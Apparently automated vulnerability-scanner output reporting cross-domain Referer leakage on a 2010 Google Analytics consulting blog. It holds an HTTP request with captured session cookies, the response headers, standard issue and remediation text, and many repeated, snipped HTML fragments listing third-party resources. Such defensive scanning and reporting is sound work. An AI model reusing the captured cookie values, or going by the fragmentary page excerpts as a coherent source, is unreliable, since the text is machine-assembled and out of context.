alt="Unique Keywords and Organic Traffic by Month" src="/images/stories/blogimg/thumbnails/thumb_unique_keywords_example.png" height="167" width="350" /></a></p> <h3>Part 3: Other Options</h3> <p>You could automate and improve this using the <a target="_blank" href="http://code.google.com/apis/analytics/docs/gdata/gdataDeveloperGuide.html">Data Export API for Google Analytics</a>, or get more rows of data more easily using a query with the Month and Keywords dimensions and Visits metric.</p><span style="float:left;font-size:1.5em; font-weight:bolder;"><br/><a name= "comment" >Comments(1)</a></span><div class="jform"><form action="http://www.analyticspros.com/index.php?option=com_content&eid=Array&Itemid=75&format=html&id=99:unique-keywords-by-month&view=article&layout=default&commenttype=20" method="post" name="wz267" ><div id="jheader"><div id="header-totals">Display # <select name="limit267" id="limit267woups0" class="inputbox" onChange ="return joobi.run('883406_number');"><option value="5">5</option><option ...[SNIP]...
Request 2
GET /blog/googleanalytics/99-unique-keywords-by-month.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 01:45:13 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 01:45:14 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 01:45:14 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 27577
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
< ...[SNIP]... <!-- var prefix = 'mailto:'; var suffix = ''; var attribs = ''; var path = 'hr' + 'ef' + '='; var addy48863 = 'caleb' + '@'; addy48863 = addy48863 + 'analyticspros' + '.' + 'com'; var addy_text48863 = 'send me an email'; document.write( '<a ' + path + '\'' + prefix + addy48863 + suffix + '\'' + attribs + '>' ); document.write( addy_text48863 ); document.write( '<\/a>' ); //--> </script> <script language='JavaScript' type='text/javascript'> <!-- document.write( '<span style=\'display: none;\'>' ); //--> </script>This e-mail address is being protected from spambots. You need JavaScript enabled to view it <script language='JavaScript' type='text/javascript'> <!-- document.write( '</' ); document.write( 'span>' ); //--> </script> or use the box at-left.</p> <p>The results: here's an example chart from the spreadsheet!</p> <p><a class="jcepopup" target="_blank" title="unique_keywords_example" href="/images/stories/blogimg/unique_keywords_example.png"><img style="border: thin solid #000000; margin: 5px;" alt="Unique Keywords and Organic Traffic by Month" src="/images/stories/blogimg/thumbnails/thumb_unique_keywords_example.png" height="167" width="350" /></a></p> <h3>Part 3: Other Options</h3> <p>You could automate and improve this using the <a target="_blank" href="http://code.google.com/apis/analytics/docs/gdata/gdataDeveloperGuide.html">Data Export API for Google Analytics</a>, or get more rows of data more easily using a query with the Month and Keywords dimensions and Visits metric.</p><span style="float:left;font-size:1.5em; font-weight:bolder;"><br/><a name= "comment" >Comments(1)</a></span><div class="jform"><form action="http://www.analyticspros.com/index.php?option=com_content&eid=Array&Itemid=75&format=html&id=99:unique-keywords-by-month&view=article&layout=default&commenttype=20" method="post" name="wz267" ><div id="jheader"><div id="header-totals">Display # <select name="limit267" id="limit267woups0" class="inputbox" onChange ="return joobi.run('883406_number');"><option value="5">5</option><option ...[SNIP]...
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
<link rel="alternate" type="application/rss+xml" title="Analytics Prose" href="http://feeds.feedburner.com/analyticspros" /> <link rel="stylesheet" href="http://www.analyticspros.com/templates/system/css/system.css" type="text/css" /> ...[SNIP]... <!-- Start Kampyle Css --> <link rel="stylesheet" type="text/css" media="screen" href="http://cf.kampyle.com/k_button.css" /> <!-- End Kampyle Css --> ...[SNIP]... </script> <script type="text/javascript" src="http://www.google.com/afsonline/show_afs_search.js"></script> ...[SNIP]... </div> <img src="http://tracking.percentmobile.com/pixel/b7b12a36-b8e8-11de-95c9-12313900c5b8" style="background:#000000;" alt="." width="2" height="2" /> </div> ...[SNIP]... <p>This morning I noticed a short <a target="_blank" href="http://analytics.blogspot.com/2010/03/more-choice-for-users-browser-based-opt.html">post on the Google Analytics blog</a> ...[SNIP]... <li>Furthermore, is opting out of Google Analytics even an important thing?.. GA already prevents collection of Personally Identifiable Information through its <a target="_blank" href="http://www.google.com/analytics/tos.html">Terms of Service</a> ...[SNIP]... d, if you don't want to be tracked by GA, you can block all cookies, or modify your browser to selectively block cookies using the Google Analytics cookie names, or get one of the existing plug-ins to <a target="_blank" href="https://addons.mozilla.org/en-US/firefox/addon/1865">block GA and other measurement and ad serving systems</a> ...[SNIP]... </em> of privacy and a false-sense that you're not being tracked... I doubt many people know how many retailers can <a target="_blank" href="http://www.aimetis.com/Solutions/Retail.aspx">track their movements through malls and stores</a> using cameras connected to huge computer systems and artificial intelligence systems that identify shoplifters automatically, <a target="_blank" href="http://www.axis.com/files/user_scenarios/ap_ret_merchandising_31107_en_0803_lo.pdf">measure the paths customers take through aisles</a>, identify if in-store signage is being looked at, and <a target="_blank" href="http://www.lighthauslogic.com/retail_solutions.html">conduct facial recognition</a> for "demographics and segmentation"... There are <a target="_blank" href="http://www.milestonesys.com/news/videos/viewVideo?Title=Smart_Client_5.0_Demonstration&id=4313">many more examples of this technology</a> out there (like <a target="_blank" href="http://www.vuitcommunications.com/">this</a>, and <a target="_blank" href="http://www.videosurveillance.com/department-stores.asp">this</a> ...[SNIP]... </a> that can analyze logfiles, not relying on cookies or script tags, or solutions like <a target="_blank" href="http://analytics.blogspot.com/2010/03/no-tags-google-analytics-integration.html">Pion Lite</a>, <a target="_blank" href="http://www.tealeaf.com/">Tealeaf</a>, or <a target="_blank" href="http://www.coradiant.com/">Coradiant</a> ...[SNIP]... </strong><a href="http://www.google.com/enterprise/marketplace/viewReviews?productListingId=5575783+4987064726678984740" target="_blank"><strong> ...[SNIP]... <div align="center"><a href="http://www.twitter.com/analyticspros"><img src="http://twitter-badges.s3.amazonaws.com/twitter-c.png" alt="Follow analyticspros on Twitter" /></a> ...[SNIP]... <p><a href="http://www.addthis.com/bookmark.php?v=250&pub=analyticspros" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" onclick="return addthis_sendto()"><img src="http://s7.addthis.com/static/btn/lg-share-en.gif" alt="Bookmark and Share" style="border:0" height="16" width="125" /></a> <script src="http://s7.addthis.com/js/250/addthis_widget.js?pub=analyticspros" type="text/javascript"></script> </p> <p><a href="http://feeds.feedburner.com/analyticspros" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon16x16.png" style="vertical-align:middle;border:0" /></a> <a href="http://feeds.feedburner.com/analyticspros" rel="alternate" type="application/rss+xml">Subscribe in a reader</a> ...[SNIP]... <p>Delivered by <a href="http://feedburner.google.com" target="_blank">FeedBurner</a> ...[SNIP]... <div style="text-align: center"><a target="_blank" href="http://www.google.com/enterprise/marketplace/viewReviews?productListingId=5575783+4987064726678984740"><img width="80" height="80" title="Analytics Pros are Google Analytics Authorized Consultants" alt="Google Analytics Certified Partners & Authorized Consultants - click to verify" src="/images/stor ...[SNIP]... <p style="text-align: center;"><iframe src="http://rcm.amazon.com/e/cm?lt1=_blank&bc1=FFFFFF&IS2=1&bg1=FFFFFF&fc1=000000&lc1=0000FF&t=analyticspros-20&o=1&p=8&l=as1&m=amazon&f=ifr&md=10FE9736YVPPT7A0FBG2&asins=0470578319" frameborder="0" scrolling="no" style="width: 120px; height: 240px;"></iframe> ...[SNIP]... </script> <script type="text/javascript" src="//s3.amazonaws.com/ki.js/8221/1kV.js" async="true"></script> ...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Analytics Prose" href="http://feeds.feedburner.com/analyticspros" /> <link rel="stylesheet" href="http://www.analyticspros.com/templates/system/css/system.css" type="text/css" /> ...[SNIP]... <!-- Start Kampyle Css --> <link rel="stylesheet" type="text/css" media="screen" href="http://cf.kampyle.com/k_button.css" /> <!-- End Kampyle Css --> ...[SNIP]... </script> <script type="text/javascript" src="http://www.google.com/afsonline/show_afs_search.js"></script> ...[SNIP]... </div> <img src="http://tracking.percentmobile.com/pixel/b7b12a36-b8e8-11de-95c9-12313900c5b8" style="background:#000000;" alt="." width="2" height="2" /> </div> ...[SNIP]... <p>A couple years ago the folks at <a href="http://www.omegadm.co.uk/" target="_blank">Omega Digital Media</a> and <a href="http://www.ga-experts.com/" target="_blank">GA Experts</a> collaborated on a <a href="http://www.ga-experts.com/blog/2006/11/how-to-get-detailed-ppc-keyword-data-from-google-analytics/" target="_blank">filter to combine the actual search term</a> (say, "size 12 men's running shoes") <a href="http://www.ga-experts.com/blog/2006/11/how-to-get-detailed-ppc-keyword-data-from-google-analytics/" target="_blank">with the bidded term</a> (say, "mens running shoes"). .. I was replying to a <a href="http://www.google.com/support/forum/p/Google+Analytics/thread?tid=3b79c0131cf3148d&hl=en" target="_blank">post</a> on the <a href="http://www.google.com/support/forum/p/Google+Analytics/" target="_blank">Google Analytics Help Forum</a> last year and wanted to reference the filter settings, but couldn't find the original post, so I've decided to write my own. .. Original credit for the idea goes to <a href="http://www.ga-experts.com/blog/2006/11/how-to-get-detailed-ppc-keyword-data-from-google-analytics/" target="_blank">Jim Newsome at Omega</a> ...[SNIP]... ith the keyword field! .. If you do, in many situations you're going to see data errors. .. It also makes easy drill-down much harder. .. If you want more powerful CPC and SEM analysis, consider using <a href="http://www.google.com/urchin/" target="_self" title="Urchin 6 Web Analytics Software from Google">Urchin 6</a> ...[SNIP]... </strong><a href="http://www.google.com/enterprise/marketplace/viewReviews?productListingId=5575783+4987064726678984740" target="_blank"><strong> ...[SNIP]... <div align="center"><a href="http://www.twitter.com/analyticspros"><img src="http://twitter-badges.s3.amazonaws.com/twitter-c.png" alt="Follow analyticspros on Twitter" /></a> ...[SNIP]... <p><a href="http://www.addthis.com/bookmark.php?v=250&pub=analyticspros" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" onclick="return addthis_sendto()"><img src="http://s7.addthis.com/static/btn/lg-share-en.gif" alt="Bookmark and Share" style="border:0" height="16" width="125" /></a> <script src="http://s7.addthis.com/js/250/addthis_widget.js?pub=analyticspros" type="text/javascript"></script> </p> <p><a href="http://feeds.feedburner.com/analyticspros" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon16x16.png" style="vertical-align:middle;border:0" /></a> <a href="http://feeds.feedburner.com/analyticspros" rel="alternate" type="application/rss+xml">Subscribe in a reader</a> ...[SNIP]... <p>Delivered by <a href="http://feedburner.google.com" target="_blank">FeedBurner</a> ...[SNIP]... <div style="text-align: center"><a target="_blank" href="http://www.google.com/enterprise/marketplace/viewReviews?productListingId=5575783+4987064726678984740"><img width="80" height="80" title="Analytics Pros are Google Analytics Authorized Consultants" alt="Google Analytics Certified Partners & Authorized Consultants - click to verify" src="/images/stor ...[SNIP]... <p style="text-align: center;"><iframe src="http://rcm.amazon.com/e/cm?lt1=_blank&bc1=FFFFFF&IS2=1&bg1=FFFFFF&fc1=000000&lc1=0000FF&t=analyticspros-20&o=1&p=8&l=as1&m=amazon&f=ifr&md=10FE9736YVPPT7A0FBG2&asins=0470578319" frameborder="0" scrolling="no" style="width: 120px; height: 240px;"></iframe> ...[SNIP]... </script> <script type="text/javascript" src="//s3.amazonaws.com/ki.js/8221/1kV.js" async="true"></script> ...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Analytics Prose" href="http://feeds.feedburner.com/analyticspros" /> <link rel="stylesheet" href="http://www.analyticspros.com/templates/system/css/system.css" type="text/css" /> ...[SNIP]... <!-- Start Kampyle Css --> <link rel="stylesheet" type="text/css" media="screen" href="http://cf.kampyle.com/k_button.css" /> <!-- End Kampyle Css --> ...[SNIP]... </script> <script type="text/javascript" src="http://www.google.com/afsonline/show_afs_search.js"></script> ...[SNIP]... </div> <img src="http://tracking.percentmobile.com/pixel/b7b12a36-b8e8-11de-95c9-12313900c5b8" style="background:#000000;" alt="." width="2" height="2" /> </div> ...[SNIP]... </strong> at the ..<a target="_blank" href="http://www.roirevolution.com/">Google Analytics Authorized Consulting firm ROI Revolution</a> to integrate this metric into the ..<a target="_blank" href="http://www.roirevolution.com/blog/2008/06/google_analytics_report_enhancer.html">Google Analytics Report Enhancer</a> ...[SNIP]... <p><img width="250" style="float: right; border-color: #000000; border-style: solid; margin: 5px;" src="http://nl.ijs.si/et/talks/esslli02/metadata_files/Haystack-FINALb.jpg" />Many in the Web Analytics claim that Google Analytics is arguably a bit lean when it comes to content analysis. ..Features like full path analysis are absent, content doesn't report visits or visitors ...[SNIP]... of work. ..What about seeing this number in context within the Google Analytics interface? ..It's an easy calculation, but mentally calculating the number is a tough trick to do all day long. ..Enter <a href="http://www.roirevolution.com/blog/2008/06/google_analytics_report_enhancer.html" target="_blank">GAREnhancer from ROI Revolution</a> ...[SNIP]... <div>Thanks again to..<a target="_blank" href="http://www.roirevolution.com/">ROI Revolution</a> ...[SNIP]... </strong> for collaborating on this to built it into the GAREnhancer script. ..Also, thanks to..<a target="_blank" href="http://www.zenithvineyard.com/">Zenith Vineyard</a> for letting me use samples from their report data - if you want to..<a target="_blank" href="http://www.zenithvineyard.com/weddings-and-events.html">get married on a vineyard</a> ...[SNIP]... </strong><a href="http://www.google.com/enterprise/marketplace/viewReviews?productListingId=5575783+4987064726678984740" target="_blank"><strong> ...[SNIP]... <div align="center"><a href="http://www.twitter.com/analyticspros"><img src="http://twitter-badges.s3.amazonaws.com/twitter-c.png" alt="Follow analyticspros on Twitter" /></a> ...[SNIP]... <p><a href="http://www.addthis.com/bookmark.php?v=250&pub=analyticspros" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" onclick="return addthis_sendto()"><img src="http://s7.addthis.com/static/btn/lg-share-en.gif" alt="Bookmark and Share" style="border:0" height="16" width="125" /></a> <script src="http://s7.addthis.com/js/250/addthis_widget.js?pub=analyticspros" type="text/javascript"></script> </p> <p><a href="http://feeds.feedburner.com/analyticspros" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon16x16.png" style="vertical-align:middle;border:0" /></a> <a href="http://feeds.feedburner.com/analyticspros" rel="alternate" type="application/rss+xml">Subscribe in a reader</a> ...[SNIP]... <p>Delivered by <a href="http://feedburner.google.com" target="_blank">FeedBurner</a> ...[SNIP]... <div style="text-align: center"><a target="_blank" href="http://www.google.com/enterprise/marketplace/viewReviews?productListingId=5575783+4987064726678984740"><img width="80" height="80" title="Analytics Pros are Google Analytics Authorized Consultants" alt="Google Analytics Certified Partners & Authorized Consultants - click to verify" src="/images/stor ...[SNIP]... <p style="text-align: center;"><iframe src="http://rcm.amazon.com/e/cm?lt1=_blank&bc1=FFFFFF&IS2=1&bg1=FFFFFF&fc1=000000&lc1=0000FF&t=analyticspros-20&o=1&p=8&l=as1&m=amazon&f=ifr&md=10FE9736YVPPT7A0FBG2&asins=0470578319" frameborder="0" scrolling="no" style="width: 120px; height: 240px;"></iframe> ...[SNIP]... </script> <script type="text/javascript" src="//s3.amazonaws.com/ki.js/8221/1kV.js" async="true"></script> ...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Analytics Prose" href="http://feeds.feedburner.com/analyticspros" /> <link rel="stylesheet" href="http://www.analyticspros.com/templates/system/css/system.css" type="text/css" /> ...[SNIP]... <!-- Start Kampyle Css --> <link rel="stylesheet" type="text/css" media="screen" href="http://cf.kampyle.com/k_button.css" /> <!-- End Kampyle Css --> ...[SNIP]... </script> <script type="text/javascript" src="http://www.google.com/afsonline/show_afs_search.js"></script> ...[SNIP]... </div> <img src="http://tracking.percentmobile.com/pixel/b7b12a36-b8e8-11de-95c9-12313900c5b8" style="background:#000000;" alt="." width="2" height="2" /> </div> ...[SNIP]... <p>This method defines the domain the ga scripts will read and write cookies... There are three options for <a href="http://code.google.com/apis/analytics/docs/gaJS/gaJSApiDomainDirectory.html#_gat.GA_Tracker_._setDomainName" target="_blank">setDomainName</a> ...[SNIP]... </em> If you're using "none" and you haven't setup a <a href="http://www.seomoz.org/blog/url-rewrites-and-301-redirects-how-does-it-all-work" target="_blank">301 redirect to consolidate "www" and "no www" into one domain</a> ...[SNIP]... none" setting does is set the "domain hash" setting to "false"... This is the same thing as the setAllowHash(false) setting... Turning the domain hash to false is essential if you are going to use the <a href="http://code.google.com/apis/analytics/docs/gaJS/gaJSApiDomainDirectory.html#_gat.GA_Tracker_._link" target="_blank">cross-domain linking feature</a> ...[SNIP]... </em>, EVER have a good reason for using "none" because it just it causes headaches for you and serious heartache for <a href="http://en.wikipedia.org/wiki/Cookie_Monster" target="_blank">Cookie Monster</a> ...[SNIP]... </em> pages, and use a custom defined value for setDomainName on sub-domain pages that references the primary domain... Note that, contrary to the <a href="http://code.google.com/apis/analytics/docs/gaJS/gaJSApiDomainDirectory.html#_gat.GA_Tracker_._setDomainName" target="_blank">instructions</a> ...[SNIP]... <p>The <a href="http://code.google.com/apis/analytics/docs/gaJS/gaJSApiDomainDirectory.html#_gat.GA_Tracker_._setAllowHash" target="_blank">setAllowHash</a> setting only needs to be used when there is a possibility you will need to use <a href="http://code.google.com/apis/analytics/docs/gaJS/gaJSApiDomainDirectory.html#_gat.GA_Tracker_._setAllowLinker" target="_blank">cross-domain tracking</a> ...[SNIP]... </strong>... Yes, Google Analytics is "available, easy, and free" - but it's not really that "easy" to setup properly... Google Analytics is a <a target="_blank" href="http://www.google.com/analytics/features.html">powerful, enterprise-class</a> product, according to their own words, and last time I checked "easy" and "enterprise-class" aren't identical twins... Anyone signing up for <a target="_blank" href="http://www.omniture.com/">Omniture</a> or <a target="_blank" href="http://www.webtrends.com">WebTrends</a> ...[SNIP]... </a> from my company or another <a target="_blank" href="http://www.google.com/analytics/partners.html">authorized consultant</a> ...[SNIP]... <br />.. _gaq.push(['_setDomainName', '.<a href="http://dickies.com/">site.com</a> ...[SNIP]... </strong><a href="http://www.google.com/enterprise/marketplace/viewReviews?productListingId=5575783+4987064726678984740" target="_blank"><strong> ...[SNIP]... <div align="center"><a href="http://www.twitter.com/analyticspros"><img src="http://twitter-badges.s3.amazonaws.com/twitter-c.png" alt="Follow analyticspros on Twitter" /></a> ...[SNIP]... <p><a href="http://www.addthis.com/bookmark.php?v=250&pub=analyticspros" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" onclick="return addthis_sendto()"><img src="http://s7.addthis.com/static/btn/lg-share-en.gif" alt="Bookmark and Share" style="border:0" height="16" width="125" /></a> <script src="http://s7.addthis.com/js/250/addthis_widget.js?pub=analyticspros" type="text/javascript"></script> </p> <p><a href="http://feeds.feedburner.com/analyticspros" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon16x16.png" style="vertical-align:middle;border:0" /></a> <a href="http://feeds.feedburner.com/analyticspros" rel="alternate" type="application/rss+xml">Subscribe in a reader</a> ...[SNIP]... <p>Delivered by <a href="http://feedburner.google.com" target="_blank">FeedBurner</a> ...[SNIP]... <div style="text-align: center"><a target="_blank" href="http://www.google.com/enterprise/marketplace/viewReviews?productListingId=5575783+4987064726678984740"><img width="80" height="80" title="Analytics Pros are Google Analytics Authorized Consultants" alt="Google Analytics Certified Partners & Authorized Consultants - click to verify" src="/images/stor ...[SNIP]... <p style="text-align: center;"><iframe src="http://rcm.amazon.com/e/cm?lt1=_blank&bc1=FFFFFF&IS2=1&bg1=FFFFFF&fc1=000000&lc1=0000FF&t=analyticspros-20&o=1&p=8&l=as1&m=amazon&f=ifr&md=10FE9736YVPPT7A0FBG2&asins=0470578319" frameborder="0" scrolling="no" style="width: 120px; height: 240px;"></iframe> ...[SNIP]... </script> <script type="text/javascript" src="//s3.amazonaws.com/ki.js/8221/1kV.js" async="true"></script> ...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Analytics Prose" href="http://feeds.feedburner.com/analyticspros" /> <link rel="stylesheet" href="http://www.analyticspros.com/templates/system/css/system.css" type="text/css" /> ...[SNIP]... <!-- Start Kampyle Css --> <link rel="stylesheet" type="text/css" media="screen" href="http://cf.kampyle.com/k_button.css" /> <!-- End Kampyle Css --> ...[SNIP]... </script> <script type="text/javascript" src="http://www.google.com/afsonline/show_afs_search.js"></script> ...[SNIP]... </div> <img src="http://tracking.percentmobile.com/pixel/b7b12a36-b8e8-11de-95c9-12313900c5b8" style="background:#000000;" alt="." width="2" height="2" /> </div> ...[SNIP]... </em> to announce the release of a new Google Analytics enhancement tool by Analytics Pros I'm calling "Dimensionator." If you know your sci-fi you should already be upset that I've mised the <a href="http://en.wikipedia.org/wiki/Borg_%28Star_Trek%29" target="_blank">Borg</a> and <a href="http://en.wikipedia.org/wiki/Terminator_%28character_concept%29" target="_blank">Terminator</a> ...[SNIP]... <p>It's a <a href="http://en.wikipedia.org/wiki/Bookmarklet" target="_blank">bookmarklet</a> ...[SNIP]... </a> and follow the instructions. Starting over three years ago I began discovering the extra dimensions that aren't listed in the Google Analytics dimensions list. I setup individual <a href="http://en.wikipedia.org/wiki/Bookmarklet" target="_blank">bookmarklets</a> ...[SNIP]... <p>Dimensionator achieves a similar result to the modified dimensions list from the <a href="http://www.roirevolution.com/blog/2008/06/google_analytics_report_enhancer.html" target="_blank">Google Analytics Report Enhancer</a> by <a href="http://www.roirevolution.com/" target="_blank">ROI Revolution</a> ...[SNIP]... </strong><a href="http://www.google.com/enterprise/marketplace/viewReviews?productListingId=5575783+4987064726678984740" target="_blank"><strong> ...[SNIP]... <div align="center"><a href="http://www.twitter.com/analyticspros"><img src="http://twitter-badges.s3.amazonaws.com/twitter-c.png" alt="Follow analyticspros on Twitter" /></a> ...[SNIP]... <p><a href="http://www.addthis.com/bookmark.php?v=250&pub=analyticspros" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" onclick="return addthis_sendto()"><img src="http://s7.addthis.com/static/btn/lg-share-en.gif" alt="Bookmark and Share" style="border:0" height="16" width="125" /></a> <script src="http://s7.addthis.com/js/250/addthis_widget.js?pub=analyticspros" type="text/javascript"></script> </p> <p><a href="http://feeds.feedburner.com/analyticspros" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon16x16.png" style="vertical-align:middle;border:0" /></a> <a href="http://feeds.feedburner.com/analyticspros" rel="alternate" type="application/rss+xml">Subscribe in a reader</a> ...[SNIP]... <p>Delivered by <a href="http://feedburner.google.com" target="_blank">FeedBurner</a> ...[SNIP]... <div style="text-align: center"><a target="_blank" href="http://www.google.com/enterprise/marketplace/viewReviews?productListingId=5575783+4987064726678984740"><img width="80" height="80" title="Analytics Pros are Google Analytics Authorized Consultants" alt="Google Analytics Certified Partners & Authorized Consultants - click to verify" src="/images/stor ...[SNIP]... <p style="text-align: center;"><iframe src="http://rcm.amazon.com/e/cm?lt1=_blank&bc1=FFFFFF&IS2=1&bg1=FFFFFF&fc1=000000&lc1=0000FF&t=analyticspros-20&o=1&p=8&l=as1&m=amazon&f=ifr&md=10FE9736YVPPT7A0FBG2&asins=0470578319" frameborder="0" scrolling="no" style="width: 120px; height: 240px;"></iframe> ...[SNIP]... </script> <script type="text/javascript" src="//s3.amazonaws.com/ki.js/8221/1kV.js" async="true"></script> ...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Analytics Prose" href="http://feeds.feedburner.com/analyticspros" /> <link rel="stylesheet" href="http://www.analyticspros.com/templates/system/css/system.css" type="text/css" /> ...[SNIP]... <!-- Start Kampyle Css --> <link rel="stylesheet" type="text/css" media="screen" href="http://cf.kampyle.com/k_button.css" /> <!-- End Kampyle Css --> ...[SNIP]... </script> <script type="text/javascript" src="http://www.google.com/afsonline/show_afs_search.js"></script> ...[SNIP]... </div> <img src="http://tracking.percentmobile.com/pixel/b7b12a36-b8e8-11de-95c9-12313900c5b8" style="background:#000000;" alt="." width="2" height="2" /> </div> ...[SNIP]... <p>I came across a link this morning to what I have to say is one of the <a target="_blank" href="http://wordpress.tv/2009/05/30/matt-cutts-google-sf09/">best talks on Search Engine Optimization</a> I've ever seen. ..It's a video of <a target="_blank" href="http://www.mattcutts.com/blog/">Matt Cutts</a> speaking at the <a target="_blank" href="http://2009.sf.wordcamp.org/">WordCamp San Francisco 2009</a> about search engine optimization and <a target="_blank" href="http://wordpress.org/">WordPress</a> ...[SNIP]... ess is that "it solves 80 - 90% of the mechanics of search engine optimization." ..I have to agree with him and I love to work with WordPress (admittedly I don't always use it... this site is built in <a target="_blank" href="http://www.joomla.org/">Joomla</a> ...[SNIP]... <p>What most people fail to realize about SEO is that your choice of <a target="_blank" href="http://en.wikipedia.org/wiki/Content_management_system">Content Management System</a> largely determines the fate of your exposure to and success with search engines. ..While there are an overwhelming myriad of <a target="_blank" href="http://www.cmsmatrix.org/">CMS choices</a> ...[SNIP]... that use a mis-mash of 302 redirects and "document codes" to make it easy for lazy editors to never have to update links within content cause untold damage to search ranking equity. ..One particularly <a target="_blank" href="http://websolutions.opentext.com/company_press_releases_cms_liveserver_launch.htm">stupid CMS</a> ...[SNIP]... <p>I just can't underscore enough the importance of selecting a CMS that won't ruin your chances of SEO, or else hire an <a target="_blank" href="http://www.pop.us/#/about/what-we-do/technology/">agency with super-expert software developers</a> ...[SNIP]... </a>I snapped a screenshot from the <a target="_blank" href="http://wordpress.tv/2009/05/30/matt-cutts-google-sf09/">video</a> ...[SNIP]... <span style="line-height: 24px;"><a target="_blank" href="http://codex.wordpress.org/Plugins/Akismet">Akismet</a> ...[SNIP]... <span style="line-height: 24px;"><a target="_blank" href="http://wordpress.org/extend/plugins/cookies-for-comments/">Cookies for Comments</a> ...[SNIP]... <span style="line-height: 24px;"><a target="_blank" href="http://wordpress.org/extend/plugins/enforce-www-preference/">Enforce www preference</a> ...[SNIP]... <span style="line-height: 24px;"><a target="_blank" href="http://wpgpl.com/wordpress-plugins/feedburner-feedsmith-wordpress-plugin/">FeedBurner FeedSmith</a> ...[SNIP]... <span style="line-height: 24px;"><a target="_blank" href="http://wordpress.org/extend/plugins/wp-super-cache/">WP Super Cache</a> ...[SNIP]... </strong><a href="http://www.google.com/enterprise/marketplace/viewReviews?productListingId=5575783+4987064726678984740" target="_blank"><strong> ...[SNIP]... <div align="center"><a href="http://www.twitter.com/analyticspros"><img src="http://twitter-badges.s3.amazonaws.com/twitter-c.png" alt="Follow analyticspros on Twitter" /></a> ...[SNIP]... <p><a href="http://www.addthis.com/bookmark.php?v=250&pub=analyticspros" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" onclick="return addthis_sendto()"><img src="http://s7.addthis.com/static/btn/lg-share-en.gif" alt="Bookmark and Share" style="border:0" height="16" width="125" /></a> <script src="http://s7.addthis.com/js/250/addthis_widget.js?pub=analyticspros" type="text/javascript"></script> </p> <p><a href="http://feeds.feedburner.com/analyticspros" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon16x16.png" style="vertical-align:middle;border:0" /></a> <a href="http://feeds.feedburner.com/analyticspros" rel="alternate" type="application/rss+xml">Subscribe in a reader</a> ...[SNIP]... <p>Delivered by <a href="http://feedburner.google.com" target="_blank">FeedBurner</a> ...[SNIP]... <div style="text-align: center"><a target="_blank" href="http://www.google.com/enterprise/marketplace/viewReviews?productListingId=5575783+4987064726678984740"><img width="80" height="80" title="Analytics Pros are Google Analytics Authorized Consultants" alt="Google Analytics Certified Partners & Authorized Consultants - click to verify" src="/images/stor ...[SNIP]... <p style="text-align: center;"><iframe src="http://rcm.amazon.com/e/cm?lt1=_blank&bc1=FFFFFF&IS2=1&bg1=FFFFFF&fc1=000000&lc1=0000FF&t=analyticspros-20&o=1&p=8&l=as1&m=amazon&f=ifr&md=10FE9736YVPPT7A0FBG2&asins=0470578319" frameborder="0" scrolling="no" style="width: 120px; height: 240px;"></iframe> 